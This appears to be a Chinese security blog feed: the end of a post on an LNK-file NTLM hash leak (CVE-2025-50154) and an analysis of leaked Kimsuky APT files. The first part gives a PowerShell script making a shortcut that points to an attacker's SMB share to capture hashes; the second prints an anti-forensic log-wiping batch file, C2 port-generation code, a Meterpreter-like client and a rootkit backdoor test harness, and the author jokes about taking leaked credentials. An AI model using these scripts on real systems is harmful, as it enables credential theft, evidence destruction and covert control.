在前面的基础上只需要修改一下PowerShell生成LNK文件的方式即可更改脚本，使图标成为默认图标（shell32.dll），使可执行值成为可以检索到的远程文件路径。

# 文件创建$shortcutPath = "C:\Users\Administrator\Desktop\1\lab.lnk"# 这个exe可以不用存在，只要把kali的SMB服务启动即可，同时这个地址必须是远程kali地址$targetPath = "\\192.168.48.129\share\calc.exe"# 修改图标为本地白名单来绕过$iconLocation = "C:\Windows\System32\SHELL32.dll"$wShell = New-Object -ComObject WScript.Shell$shortcut = $wShell.CreateShortcut($shortcutPath)$shortcut.TargetPath = $targetPath$shortcut.IconLocation = $iconLocation$shortcut.Save()Write-Output "Shortcut created at: $shortcutPath"

运行PowerShell脚本：

Kali Linux开启的SMB服务接收到Hash值：

3.2 对应补丁以及漏洞信息

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-50154

安装方式和旧漏洞的方式一致：

查看是否安装上补丁：

systeminfo

我是N0va7，我在渊龙Sec安全团队等你微信公众号：渊龙Sec安全团队欢迎关注我，一起学习，一起进步~本篇文章为团队成员原创文章，请不要擅自盗取！

阅读原文

跳转微信打开

Kimsuky APT泄露文件简单分析

Fri, 15 Aug 2025 11:24:00 +0800

Snow狼 2025-08-15 11:24 广东

此次泄露得以窥探APT组织的相关技术和能力，特别是在针对目标上的策略和手法，团队核心成员Snow 狼师傅针对泄露的文件展开了分析，让我们一起学习~

事件

朝鲜黑客组织Kimsuky APT一名成员遭遇重大数据泄露，泄露了一些内部文件和工具。

入侵大概发生在2025年6月初，此次泄露暴露了该组织后门、网络钓鱼框架和侦察行动。

公网泄露链接为：

https[:]//data[.]ddosecrets[.]com/APT%20Down%20-%20The%20North%20Korea%20Files/

分析

我这里简要下载了 zip 目录下的 work.zip 压缩包，所以仅分析里面的比较好玩的文件。

路径：

\work\work\home\user\Desktop

test.py:

使用第三方库 xtermgui 来创建一个终端图形用户界面。

xtermgui 这个库允许开发者在纯文本的终端（命令行窗口）中，创建出具有图层、颜色和精确定位等特性的、更丰富的交互界面。

from xtermgui import Colour, RGBs, LayeredGUI, CoordinateColour.configure_default_background(RGBs.DEFAULT_BACKGROUND_WSL.value)classMyGUI(LayeredGUI):def__init__(self) -> None:        super().__init__()  # self.base_layer is created automatically        self.second_layer = self.add_layer("Layer Name", z=1)  # z-index is the same as that of the existing layer with the greatest z-index by defaultdefmain() -> None:    gui = MyGUI()    text_base_layer = "This text will be printed in the console, on the base layer."    text_1_second_layer = "This text will be printed in the console, on the second layer."    text_2_second_layer = "This text will also be printed in the console, on the second layer."    coordinates = Coordinate(10, 5)with gui.start():        gui.print(text_base_layer, at=coordinates)  # Prints on the active layer by default - this is initially the base layer        gui.print(text_1_second_layer, at=coordinates, layer=gui.second_layer)  # Prints over the text on the base layerwith gui.as_active(gui.second_layer):  # Second layer is set as active within this scope only            gui.print(text_2_second_layer, at=coordinates)  # Overwrites the existing text        gui.clear(layer=gui.second_layer)  # Only the content printed to the base layer now showsif __name__ == "__main__":    main()

运行结果：

clean.bat:

通过一系列的 del (删除文件) 和 rd (删除目录) 命令，试图移除Windows更新的卸载备份、临时文件、日志、预取文件、Cookies以及最近访问的文档记录等。

@echo off color 0bRD %windir%\$hf_mig$ /Q /S dir %windir%\$NtUninstall/a:d /b >%windir%\Patches.txt for /f %%i in (%windir%\Patches.txt) do rd %windir%\%%i /s /q del %windir%\Patches.txt /f /q rd /s /q %windir%\SoftwareDistribution\Download & md %windir\SoftwareDistribution\Downloaddel %windir%\*.log /f /q del /f /s /q %windir%\*.bak del /f /s /q %windir%\prefetch\*.* rd /s /q %windir%\temp & md %windir%\tempdel /f /q %userprofile%\AppData\Roaming\Microsoft\Windows\Cookies\*.*del /f /s /q "%userprofile%\AppData\Local\Microsoft\Windows\Temporary Internet Files\*.*"del /f /s /q "%userprofile%\AppData\Roaming\Microsoft\Windows\Recent\*.*"del /f /s /q %userprofile%\appdata\roaming\microsoft\windows\recent\*.*del /f /s /q "%userprofile%\appdata\local\temp\*.*"rd /s /q %userprofile%\AppData\Local\Temp\vmware-host\VMwareDnD &md %userprofile%\AppData\Local\Temp\vmware-host\VMwareDnDrd  /s /q  windir

这里我简单加了个注释方便理解：

@echo off :: 关闭命令回显，让窗口输出更干净color 0b:: 设置窗口颜色为黑底亮水绿色，美化界面RD %windir%\$hf_mig$ /Q /S :: 删除旧版Windows的热修复补丁迁移文件夹dir %windir%\$NtUninstall/a:d /b >%windir%\Patches.txt :: 将所有更新卸载文件夹的名称列表输出到临时文件for /f %%i in (%windir%\Patches.txt) do rd %windir%\%%i /s /q :: 逐个删除列表中的所有更新卸载文件夹del %windir%\Patches.txt /f /q :: 删除刚才创建的临时文件rd /s /q %windir%\SoftwareDistribution\Download & md %windir%\SoftwareDistribution\Download:: 清空Windows Update的下载缓存目录，然后重建空目录del %windir%\*.log /f /q :: 删除C:\Windows目录下的所有日志文件 (*.log)del /f /s /q %windir%\*.bak :: 递归删除C:\Windows及其子目录下的所有备份文件 (*.bak)del /f /s /q %windir%\prefetch\*.* :: 清空预取文件夹，清除程序启动痕迹rd /s /q %windir%\temp & md %windir%\temp:: 清空系统临时文件夹，然后重建空目录del /f /q %userprofile%\AppData\Roaming\Microsoft\Windows\Cookies\*.*:: 删除IE浏览器的Cookiesdel /f /s /q "%userprofile%\AppData\Local\Microsoft\Windows\Temporary Internet Files\*.*":: 删除IE浏览器的缓存文件del /f /s /q "%userprofile%\AppData\Roaming\Microsoft\Windows\Recent\*.*":: 删除“最近使用的项目”记录del /f /s /q %userprofile%\appdata\roaming\microsoft\windows\recent\*.*:: 再次删除“最近使用的项目”记录del /f /s /q "%userprofile%\appdata\local\temp\*.*":: 清空用户个人临时文件夹rd /s /q %userprofile%\AppData\Local\Temp\vmware-host\VMwareDnD &md %userprofile%\AppData\Local\Temp\vmware-host\VMwareDnD:: 清理VMware虚拟机拖放功能的临时文件rd  /s /q  windir:: 尝试删除当前目录下名为 "windir" 的文件夹 (这是一个语法错误，本意可能是想删除 %windir%)

fofa.txt:

保存的fofa搜索语句：

title="User portal" && country="JP" && icon_hash="1601194732"

不过账号已经无效了

proxy_test.py：

获取当前用户的Internet Explorer代理设置。这包括自动检测设置、PAC脚本URL和手动设置的代理服务器。
解析这些设置，找出对于一个给定的目标URL（例如http://www.google.com），系统最终会使用哪个代理服务器。
测试找到的代理服务器，验证它们是否真的可以正常工作。

import ctypesimport ctypes.wintypesimport sysclassWINHTTP_CURRENT_USER_IE_PROXY_CONFIG(ctypes.Structure):    _fields_ = [("fAutoDetect", ctypes.wintypes.BOOL),                ("lpszAutoConfigUrl", ctypes.wintypes.LPWSTR),                ("lpszProxy", ctypes.wintypes.LPWSTR),                ("lpszProxyBypass", ctypes.wintypes.LPWSTR)]classWINHTTP_AUTOPROXY_OPTIONS(ctypes.Structure):    _fields_ = [("dwFlags", ctypes.wintypes.DWORD),                ("dwAutoDetectFlags", ctypes.wintypes.DWORD),                ("lpszAutoConfigUrl", ctypes.wintypes.LPCWSTR),                ("lpvReserved", ctypes.c_void_p),                ("dwReserved", ctypes.wintypes.DWORD),                ("fAutoLogonIfChallenged", ctypes.wintypes.BOOL)]classWINHTTP_PROXY_INFO(ctypes.Structure):    _fields_ = [("dwAccessType", ctypes.wintypes.DWORD),                ("lpszProxy", ctypes.wintypes.LPCWSTR),                ("lpszProxyBypass", ctypes.wintypes.LPCWSTR)]WINHTTP_USER_AGENT = ctypes.c_wchar_p('Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko')WINHTTP_ACCESS_TYPE_DEFAULT_PROXY = 0WINHTTP_ACCESS_TYPE_NO_PROXY = 1WINHTTP_ACCESS_TYPE_NAMED_PROXY = 3WINHTTP_NO_PROXY_NAME = 0WINHTTP_NO_PROXY_BYPASS = 0defShowLastError(message, alignment = 0):    error_id = ctypes.GetLastError()print' ' * alignment + '[-] Error on %s: %s' % (message, error_id)if error_id == 12167:        title = 'ERROR_WINHTTP_UNABLE_TO_DOWNLOAD_SCRIPT'        message = 'The PAC file cannot be downloaded. For example, the server referenced by the PAC URL may not have been reachable, or the server returned a 404 NOT FOUND response.'elif error_id == 12007:        title = 'ERROR_WINHTTP_NAME_NOT_RESOLVED'        message = 'The server name cannot be resolved.'elif error_id == 12029:        title = 'ERROR_WINHTTP_CANNOT_CONNECT'        message = 'Returned if connection to the server failed.'elif error_id == 12002:        title = 'ERROR_WINHTTP_TIMEOUT'        message = 'The request has timed out.'elif error_id == 12180:        title = 'ERROR_WINHTTP_AUTODETECTION_FAILED'        message = 'Returned by WinHttpDetectAutoProxyConfigUrl if WinHTTP was unable to discover the URL of the Proxy Auto-Configuration (PAC) file.'else:        title = 'UNKNOWN'        message = 'unknown'    msg_max_len = 70    msg_list = [message[i:i+msg_max_len] for i in range(0, len(message), msg_max_len)]print' ' * alignment + '    => %s' % titlefor msg in msg_list:print' ' * alignment + '       %s' % msgdefGetCurrentProxies():    pProxyConfig = WINHTTP_CURRENT_USER_IE_PROXY_CONFIG()    result = ctypes.windll.winhttp.WinHttpGetIEProxyConfigForCurrentUser(ctypes.byref(pProxyConfig))if result == False:        ShowLastError('WinHttpGetIEProxyConfigForCurrentUser')returnFalse, NonereturnTrue, pProxyConfigdefGetProxyInfoList(pProxyConfig, target_url):print'n[*] Checking proxy configuration alternatives...'    proxy_list = []    hSession = ctypes.windll.winhttp.WinHttpOpen(WINHTTP_USER_AGENT,  WINHTTP_ACCESS_TYPE_NO_PROXY, WINHTTP_NO_PROXY_NAME, WINHTTP_NO_PROXY_BYPASS, 0)if hSession isNone:        ShowLastError('WinHttpOpen')        sys.exit()    WINHTTP_AUTOPROXY_AUTO_DETECT = 0x00000001    WINHTTP_AUTO_DETECT_TYPE_DHCP = 0x00000001    WINHTTP_AUTO_DETECT_TYPE_DNS_A = 0x00000002    WINHTTP_AUTOPROXY_CONFIG_URL = 0x00000002if pProxyConfig.fAutoDetect:print'n  (1) Automatically detect settings (enabled)'print'      [*] Trying to get the proxy using the conventional method...'        pAutoProxyOptions = WINHTTP_AUTOPROXY_OPTIONS()        pProxyInfo = WINHTTP_PROXY_INFO()        pAutoProxyOptions.dwFlags = WINHTTP_AUTOPROXY_AUTO_DETECT        pAutoProxyOptions.dwAutoDetectFlags = WINHTTP_AUTO_DETECT_TYPE_DHCP | WINHTTP_AUTO_DETECT_TYPE_DNS_A        pAutoProxyOptions.lpszAutoConfigUrl = 0        lpcwszUrl = ctypes.wintypes.LPCWSTR(target_url)        result = ctypes.windll.winhttp.WinHttpGetProxyForUrl(hSession, lpcwszUrl, ctypes.byref(pAutoProxyOptions), ctypes.byref(pProxyInfo))if result == False:            ShowLastError('WinHttpGetProxyForUrl', 6)print'n      [*] Trying to get the proxy using the AutoConfigURL...'            dwAutoDetectFlags = WINHTTP_AUTO_DETECT_TYPE_DHCP | WINHTTP_AUTO_DETECT_TYPE_DNS_A            ppwszAutoConfigUrl = ctypes.wintypes.LPWSTR()            result = ctypes.windll.winhttp.WinHttpDetectAutoProxyConfigUrl(dwAutoDetectFlags, ctypes.byref(ppwszAutoConfigUrl))if result == False:                ShowLastError('WinHttpDetectAutoProxyConfigUrl', 10)else:print'      [+] Trying to get the proxy from the obtained URL (%s)' % ppwszAutoConfigUrl.value                pAutoProxyOptions.dwFlags = WINHTTP_AUTOPROXY_CONFIG_URL                pAutoProxyOptions.dwAutoDetectFlags = 0                pAutoProxyOptions.fAutoLogonIfChallenged = True                pAutoProxyOptions.lpszAutoConfigUrl = ppwszAutoConfigUrl                result = ctypes.windll.winhttp.WinHttpGetProxyForUrl(hSession, lpcwszUrl, ctypes.byref(pAutoProxyOptions), ctypes.byref(pProxyInfo))if result:print'      [+] Proxy: %s' % (pProxyInfo.lpszProxy)                    proxy_list.append(pProxyInfo)else:                    ShowLastError('WinHttpGetProxyForUrl', 10)else:print'      [+] Proxy: %s' % (pProxyInfo.lpszProxy)            proxy_list.append(pProxyInfo)if pProxyConfig.lpszAutoConfigUrl:print'n  (2) Use automatic configuration script (%s)' % pProxyConfig.lpszAutoConfigUrl        pAutoProxyOptions = WINHTTP_AUTOPROXY_OPTIONS()        pProxyInfo = WINHTTP_PROXY_INFO()        pAutoProxyOptions.dwFlags = WINHTTP_AUTOPROXY_CONFIG_URL        pAutoProxyOptions.dwAutoDetectFlags = 0        pAutoProxyOptions.fAutoLogonIfChallenged = True        pAutoProxyOptions.lpszAutoConfigUrl = pProxyConfig.lpszAutoConfigUrl        lpcwszUrl = ctypes.wintypes.LPCWSTR(target_url)        result = ctypes.windll.winhttp.WinHttpGetProxyForUrl(hSession, lpcwszUrl, ctypes.byref(pAutoProxyOptions), ctypes.byref(pProxyInfo))if result == False:            ShowLastError('WinHttpGetProxyForUrl', 6)else:print'      [+] Proxy: %s' % (pProxyInfo.lpszProxy)            proxy_list.append(pProxyInfo)if pProxyConfig.lpszProxy:print'n  (3) Use a proxy server for your LAN'        pProxyInfo = WINHTTP_PROXY_INFO()        WINHTTP_ACCESS_TYPE_NAMED_PROXY = 3        pProxyInfo.dwAccessType = WINHTTP_ACCESS_TYPE_NAMED_PROXY        pProxyInfo.lpszProxy = pProxyConfig.lpszProxy        pProxyInfo.lpszProxyBypass = pProxyConfig.lpszProxyBypassprint'      [+] Proxy: %s' % pProxyConfig.lpszProxyprint'      [+] Proxy Bypass: %s' % pProxyConfig.lpszProxyBypass        proxy_list.append(pProxyInfo)    ctypes.windll.winhttp.WinHttpCloseHandle(hSession)return proxy_listdefCheckProxyStatus(proxyInfo, target_server, target_port):    hSession = ctypes.windll.winhttp.WinHttpOpen(WINHTTP_USER_AGENT,  WINHTTP_ACCESS_TYPE_DEFAULT_PROXY, WINHTTP_NO_PROXY_NAME, WINHTTP_NO_PROXY_BYPASS, 0)if hSession isNone:        ShowLastError('WinHttpOpen')return    server_name = ctypes.c_wchar_p(target_server)    INTERNET_DEFAULT_HTTP_PORT = target_port    hInternet = ctypes.windll.winhttp.WinHttpConnect(hSession, server_name, INTERNET_DEFAULT_HTTP_PORT, 0)if hInternet isNone:        ShowLastError('WinHttpConnect', 8)returnFalse    WINHTTP_FLAG_BYPASS_PROXY_CACHE = 0x00000100    WINHTTP_FLAG_SECURE = 0x00800000    dwFlags = WINHTTP_FLAG_BYPASS_PROXY_CACHE    pwszVerb = ctypes.c_wchar_p('GET')    pwszObjectName = ctypes.c_wchar_p('')    hRequest = ctypes.windll.winhttp.WinHttpOpenRequest(hInternet, pwszVerb, pwszObjectName, 0, 0, 0, dwFlags)if hRequest isNone:        ShowLastError('WinHttpOpenRequest', 8)returnFalse    WINHTTP_OPTION_PROXY = 38    result = ctypes.windll.winhttp.WinHttpSetOption(hRequest, WINHTTP_OPTION_PROXY, ctypes.byref(proxyInfo), ctypes.sizeof(proxyInfo))if result == False:        ShowLastError('WinHttpSetOption', 8)returnFalse    WINHTTP_NO_ADDITIONAL_HEADERS = 0    WINHTTP_NO_REQUEST_DATA = 0    result = ctypes.windll.winhttp.WinHttpSendRequest(hRequest, WINHTTP_NO_ADDITIONAL_HEADERS, 0, WINHTTP_NO_REQUEST_DATA, 0, 0, 0)if result == False:        ShowLastError('WinHttpSendRequest', 8)returnFalseelse:        WINHTTP_QUERY_STATUS_CODE = 19        WINHTTP_QUERY_STATUS_TEXT = 20        WINHTTP_QUERY_RAW_HEADERS_CRLF = 22        WINHTTP_HEADER_NAME_BY_INDEX = 0        WINHTTP_NO_HEADER_INDEX = 0        dwInfoLevel = WINHTTP_QUERY_RAW_HEADERS_CRLF        lpdwBufferLength = ctypes.wintypes.DWORD()        lpdwIndex = ctypes.wintypes.DWORD()        result = ctypes.windll.winhttp.WinHttpReceiveResponse(hRequest, 0)if result:            result = ctypes.windll.winhttp.WinHttpQueryHeaders(hRequest, WINHTTP_QUERY_RAW_HEADERS_CRLF,                                                               WINHTTP_HEADER_NAME_BY_INDEX, 0,                                                               ctypes.byref(lpdwBufferLength),                                                               WINHTTP_NO_HEADER_INDEX)            ERROR_INSUFFICIENT_BUFFER = 122if ctypes.GetLastError() == ERROR_INSUFFICIENT_BUFFER:                lpBuffer = ctypes.create_string_buffer(lpdwBufferLength.value)                result = ctypes.windll.winhttp.WinHttpQueryHeaders(hRequest, WINHTTP_QUERY_RAW_HEADERS_CRLF,                                                                   WINHTTP_HEADER_NAME_BY_INDEX, ctypes.byref(lpBuffer),                                                                   ctypes.byref(lpdwBufferLength),                                                                   WINHTTP_NO_HEADER_INDEX)if result:                    line = lpBuffer.raw.replace('x00', '').split('n')[0]                    space_1 = line.find(' ')                    space_2 = line.find(' ', space_1+1)                    code = line[space_1:space_2].strip()                    text = line[space_2:].strip()print"t[*] HTTP Query Status Code / Text: nt    %s / %s" % (code, text)if code != "200":returnFalseelse:returnTrue    ctypes.windll.winhttp.WinHttpCloseHandle(hRequest)    ctypes.windll.winhttp.WinHttpCloseHandle(hInternet)    ctypes.windll.winhttp.WinHttpCloseHandle(hSession)returnTruedefmain():    result, pProxyConfig = GetCurrentProxies()if result == False:        sys.exit()print'n[*] We got the proxy configuration.'if pProxyConfig isNone:print'[*] No proxy setting found for the current user.'        sys.exit()    target_server = 'www.google.com'    target_url = 'http://' + target_server    target_port = 80    proxy_list = GetProxyInfoList(pProxyConfig, target_url)print'n[*] Number of proxies: %s' % str(len(proxy_list))print'n[*] Testing if proxy servers actually work...'for proxy in proxy_list:print'n    [*] Proxy "%s" ... ' % proxy.lpszProxy        result = CheckProxyStatus(proxy, target_server, target_port)if result:print'        [+] Works! :)'else:print'        [-] Does not work :('if __name__ == '__main__':    main()

sofo.txt:

Sophos Central的demo用户名和密码文件。。

checksum8.c:

这段代码是一个用于隐蔽通信的端口生成和验证工具的客户端部分。

用途:

恶意软件C2通信: 一个木马或后门程序可以在受害者机器上运行generate_port，计算出当天或当次会话应该连接哪个端口，然后向该端口发起连接。
服务器端验证: C2服务器在所有端口上监听，但只对连接到“合法”端口（即校验和匹配的端口）的请求做出响应，而忽略所有其他端口的连接，从而增加了隐蔽性。

#include#include#includechar** wrap(char* s, int w){int len = strlen(s);int num_substrings = len / w + (len % w != 0);char** substrings = malloc(num_substrings * sizeof(char*));for (int i = 0; i < num_substrings; i++) {        substrings[i] = malloc((w + 1) * sizeof(char));strncpy(substrings[i], s + i * w, w);        substrings[i][w] = '\0';    }return substrings;}int _sum_data(char* data) {int sum_ = 0;char** substrings = wrap(data, 2);for (int i = 0; i < strlen(data) / 2 + (strlen(data) % 2 != 0); i++) {        sum_ += strtol(substrings[i], NULL, 16);    }for (int i = 0; i < strlen(data) / 2 + (strlen(data) % 2 != 0); i++) {free(substrings[i]);    }free(substrings);return sum_;}char* compute_checksum8_mod256(char* data){int sum = _sum_data(data);printf("sum %d\n", sum);char* checksum = malloc(3 * sizeof(char));sprintf(checksum, "%02X", sum % 256);return checksum;}int* generate_port(char* check_sum, int min, int max, int* num_ports){int* ports = malloc((max - min + 1) * sizeof(int));int index = 0;for (int i = min; i <= max; i++) {char str[6];sprintf(str, "%d", i);char* sum = compute_checksum8_mod256(str);if (strcmp(sum, check_sum) == 0) {            ports[index] = i;            index++;        }free(sum);    }    *num_ports = index;return ports;}intchecksum8(char* data, int size){int check = 0;for (int i = 0; i < size; i++) {        check += data[i];    }return check & 0xFF;}intmain(){char str[6];sprintf(str, "%d", 6357);//printf("%s\n",str );int  sum = checksum8(str,4);printf("sum   %d\n",sum);// int num_ports;// int* ports = generate_port("88", 10000, 30000, &num_ports);// for (int i = 0; i < num_ports; i++) {//     printf("%d ", ports[i]);// }// free(ports);return0;}

路径

\work\work\home\user\Desktop\desktop\mettle

client.py：

从代码中的命名（如PacketDispatcher, ChannelContainer, init_meterpreter）和结构来看，它极有可能是在模仿 Metasploit 框架中的 Meterpreter 客户端。

from attrdict import AttrDictfrom channel_container import ChannelContainerfrom packet_dispatcher import PacketDispatcherclassClient(PacketDispatcher, ChannelContainer):def__init__(self):        super(Client, self).__init__(self)        self.aliases = {}        self.commands = []        self.sock = None# self.dict - self# self.sock = None# TODO how to fix it# from extensions.stdapi.fs.dir import Dir# self.register_extension_alias("fs", Dir())# self.sock = sock# print("socksock" + sock)# self.init_meterpreter(sock, opts)    @staticmethoddefregister_extension_alias(name, ext):# if isinstance(ext, dict) is True:# 	for k in ext:# 		setattr(Client, name, ext[k])# else:        setattr(Client, name, ext)defregister_extension_aliases(self, aliases):for alias in aliases:            alias = AttrDict(alias)            self.register_extension_alias(alias.name, alias.ext)definit_meterpreter(self, sock, opts={}):# print("rstream:" + str(sock))        self.sock = sockif"passive_dispatcher"in opts:passelse:from client_core import ClientCore            self.register_extension_alias("core", ClientCore(self))# Register the channel inbound packet handlerfrom channel import Channel            self.register_inbound_handler(Channel)            self.monitor_socket()#### Extension registration##### Loads the client half of the supplied extension and initializes it as a# registered extension that can be reached through client.ext.[extension].#defadd_extension(self, name, commands=[]):# self.commands |= commands# print("name:" + name)import importlib# from .extensions# from lib.rex.post.meterpreter.extensions.stdapi import# TODO 不要写死extensions localtion# from importlib.machinery import SourceFileLoader# import os# print(os.path.realpath(__file__))# current_path = os.path.split(os.path.realpath(__file__))[0]# extensions_path = os.path.join(current_path, 'extensions')# module_path = os.path.join(extensions_path, name)## klass = SourceFileLoader(name, os.path.join(module_path, "__init__.py")).load_module()# print(klass)        mod = importlib.import_module('lib.rex.post.meterpreter.extensions.' + name)# mod = importlib.import_module(".extensions." + name)        getattr(mod, name.title())(self)# from extensions.stdapi.fs.dir import Dir# self.register_extension_alias("fs", mod)

ps:就是原始代码样式，顶尖cx黑客会点中文很正常

路径

\work\work\home\user\Desktop\desktop\uni_certs

存储了一堆证书文件

路径

\work\work\home\user\Desktop\tomcat20220420_rootkit\tomcat20220420_rootkit

看路径，知功能

其中的自动化执行脚本一眼丁真

路径

\work\work\home\user\Desktop\0128\0128

一眼构建好的payload，看见就跟回老家似的一样熟悉

路径

\work\work\home\user\Desktop\backdoor\20220812

Linux后门

linux-inject-master明显是这个工具：

https://github.com/gaffe23/linux-inject/

路径

\work\work\home\user\Desktop\backdoor\20230201

Linux后门

严禁不合规的使用，严禁对外传播。

偷了！

路径

\work\work\home\user\Downloads\toybox\third_party_toybox

明显是 https://landley.net/toybox/ 开源代码

简单来说，Toybox 是一个集成了众多标 Linux 命令行工具（如 ls, cat, ps, grep 等）于一体的、轻量级的、遵循许可证规范的单一可执行文件。

暂时不知道他们用来干嘛。

路径

C:\Users\Administrator\Desktop\work\work\home\user\Downloads\cert

原本一眼是下载的证书目录，结果还有专属的韩国凭据啥的，拿了😋

路径

\work\work\home\user\KoviD\test\Artefacts

这里有个 qemu-runner.sh 脚本需要注意。

这段脚本是一个高度自动化的测试框架，专门用于测试一个名为 kovid.ko 的Linux内核模块。

其中，核心后门测试代码为：

execute_backdoor_test() {local GUEST_TEST_SCRIPT=$1local HOST_TEST_SCRIPT=$2local TEST_LOG_GUEST="$(basename "${GUEST_TEST_SCRIPT%.sh}.log")"local TEST_LOG_HOST="$(basename "${HOST_TEST_SCRIPT%.sh}.log")"# Create a writable copy of the root filesystem    TEMP_ROOTFS="/tmp/rootfs_writable_$(basename "$ROOT_FS")"    cp "${ROOT_FS}""${TEMP_ROOTFS}"echo"Starting QEMU in background for backdoor test: $(basename "$GUEST_TEST_SCRIPT")"# Launch QEMU in the background and redirect output to the build directory    qemu-system-x86_64 \        -kernel "$KERNEL_IMAGE" \        -append "root=/dev/sda rw console=ttyS0,115200 init=/sbin/init" \        -drive format=raw,file="$TEMP_ROOTFS" \        -device e1000,netdev=net0 \        -netdev user,id=net0,hostfwd=tcp::${SSH_PORT}-:22,hostfwd=tcp::9999-:9999 \$QEMU_FLAGS > "${CMAKE_BINARY_DIR}/qemu_output_$(basename "$GUEST_TEST_SCRIPT").log" 2>&1 &local QEMU_PID=$!# Wait for SSH to become availableecho"Waiting for SSH to be ready for backdoor test: $(basename "$GUEST_TEST_SCRIPT")..."for i in {1..30}; doif ssh -i "$SSH_KEY" -o BatchMode=yes -o ConnectTimeout=5 -p "${SSH_PORT}" root@localhost 'echo SSH is ready' >/dev/null 2>&1; thenecho"SSH connection established for backdoor test: $(basename "$GUEST_TEST_SCRIPT")."breakfiecho"SSH not ready, retrying in 3 seconds... (Attempt $i/30)"        sleep 3done# Final check if SSH is still not availableif ! ssh -i "$SSH_KEY" -o BatchMode=yes -o ConnectTimeout=5 -p "${SSH_PORT}" root@localhost 'echo SSH is ready' >/dev/null 2>&1; thenecho"Failed to establish SSH connection to QEMU for backdoor test: $(basename "$GUEST_TEST_SCRIPT"). Exiting..."kill -SIGTERM "$QEMU_PID" 2>/dev/null || true        rm -f "$TEMP_ROOTFS"exit 1fi# Copy Netcat and its libraries to the guestecho"Copying Netcat and its libraries to QEMU..."    scp -i "$SSH_KEY" -o StrictHostKeyChecking=no -P "${SSH_PORT}" /bin/nc.openbsd root@localhost:"/bin/nc" || {echo"Failed to copy Netcat to QEMU."kill -SIGTERM "$QEMU_PID" 2>/dev/null || true        rm -f "$TEMP_ROOTFS"exit 1    }    scp -i "$SSH_KEY" -o StrictHostKeyChecking=no -P "${SSH_PORT}" /lib/x86_64-linux-gnu/libbsd.so.0 root@localhost:"/lib/libbsd.so.0" || {echo"Failed to copy libbsd.so.0 to QEMU."kill -SIGTERM "$QEMU_PID" 2>/dev/null || true        rm -f "$TEMP_ROOTFS"exit 1    }    scp -i "$SSH_KEY" -o StrictHostKeyChecking=no -P "${SSH_PORT}" /lib/x86_64-linux-gnu/libmd.so.0 root@localhost:"/lib/libmd.so.0" || {echo"Failed to copy libmd.so.0 to QEMU."kill -SIGTERM "$QEMU_PID" 2>/dev/null || true        rm -f "$TEMP_ROOTFS"exit 1    }# Transfer and execute the guest backdoor test scriptecho"Transferring and executing guest backdoor test script: $(basename "$GUEST_TEST_SCRIPT") on QEMU..."    scp -i "$SSH_KEY" -o StrictHostKeyChecking=no -P "${SSH_PORT}""$GUEST_TEST_SCRIPT" root@localhost:"$RFS_PATH/$(basename "$GUEST_TEST_SCRIPT")" || {echo"Failed to transfer guest backdoor test script: $(basename "$GUEST_TEST_SCRIPT") to QEMU."kill -SIGTERM "$QEMU_PID" 2>/dev/null || true        rm -f "$TEMP_ROOTFS"exit 1    }# Execute the guest backdoor test script in the background on QEMU    ssh -i "$SSH_KEY" -o StrictHostKeyChecking=no -p "${SSH_PORT}" root@localhost "nohup sh -c 'chmod +x $RFS_PATH/$(basename "$GUEST_TEST_SCRIPT") && $RFS_PATH/$(basename "$GUEST_TEST_SCRIPT")' > $RFS_PATH/$TEST_LOG_GUEST 2>&1 &" || {echo"Failed to execute guest backdoor test script: $(basename "$GUEST_TEST_SCRIPT") on QEMU."kill -SIGTERM "$QEMU_PID" 2>/dev/null || true        rm -f "$TEMP_ROOTFS"exit 1    }    sleep 4  # Wait briefly to ensure the test script starts# Execute the host backdoor test scriptecho"Executing host backdoor test script: $(basename "$HOST_TEST_SCRIPT")..."    bash "$HOST_TEST_SCRIPT" > "$TEST_LOG_HOST" 2>&1# Retrieve the guest log file from QEMUecho"Retrieving log file $TEST_LOG_GUEST from QEMU..."    scp -i "$SSH_KEY" -o StrictHostKeyChecking=no -P "${SSH_PORT}" root@localhost:"$RFS_PATH/$TEST_LOG_GUEST""${CMAKE_BINARY_DIR}/" || {echo"Failed to retrieve log file $TEST_LOG_GUEST from QEMU."    }# Manually kill QEMU after backdoor testecho"Killing QEMU after backdoor test: $(basename "$GUEST_TEST_SCRIPT")..."kill -SIGTERM "$QEMU_PID" 2>/dev/null || true# Wait for QEMU to terminatewait"$QEMU_PID" 2>/dev/null || true# Display completion messagesecho"Backdoor test script $(basename "$GUEST_TEST_SCRIPT") completed. Output saved to $TEST_LOG_GUEST."echo"Host backdoor test script $(basename "$HOST_TEST_SCRIPT") completed. Output saved to $TEST_LOG_HOST."# Cleanupecho"Cleaning up temporary files for backdoor test: $(basename "$GUEST_TEST_SCRIPT")..."    rm -f "$TEMP_ROOTFS"echo"Cleanup completed for backdoor test: $(basename "$GUEST_TEST_SCRIPT")."}

这段Bash脚本是一个功能完备、高度自动化的内核模块CI/CD（持续集成/持续部署）测试框架。它通过QEMU创建了一个安全、隔离、可重复的测试环境，能够自动化地完成以下所有工作：

环境搭建: 启动虚拟机，配置网络。
部署: 将待测试的内核模块和测试脚本部署到虚拟机中。
执行: 运行测试脚本。
交互测试: 支持需要宿主机和虚拟机协同工作的复杂场景（如网络后门测试）。
结果收集: 自动将测试日志从虚拟机下载回宿主机。
清理: 自动关闭虚拟机并删除所有临时文件。
测试选择: 支持根据环境变量和标记来选择性地运行测试。

路径

C:\Users\Administrator\Desktop\work\work\home\user\gglsbl\gglsbl

client.py：

这段代码实现了一个Google Safe Browsing API v4的客户端，名为 gglsbl。

使攻击者能够在本地高效地查询一个URL是否被Google标记为恶意网站（例如，钓鱼网站、恶意软件分发网站等），而不需要每次都直接去请求Google的服务器。

#!/usr/bin/env pythonfrom base64 import b64decodeimport loggingfrom gglsbl.utils import to_hexfrom gglsbl.protocol import SafeBrowsingApiClient, URLfrom gglsbl.storage import SqliteStorage, ThreatList, HashPrefixListlog = logging.getLogger('gglsbl')log.addHandler(logging.NullHandler())class SafeBrowsingList(object):"""Interface for Google Safe Browsing API    supporting partial update of the local cache.    https://developers.google.com/safe-browsing/v4/    """    def __init__(self, api_key, db_path='/tmp/gsb_v4.db',                 discard_fair_use_policy=False, platforms=None, timeout=10):"""Constructor.        Args:            api_key: string, a key for API authentication.            db_path: string, path to SQLite DB file to store cached data.            discard_fair_use_policy: boolean, disable request frequency throttling (only for testing).            platforms: list, threat lists to look up, default includes all platforms.            timeout: seconds to wait for Sqlite DB to become unlocked from concurrent WRITE transaction.        """        self.api_client = SafeBrowsingApiClient(api_key, 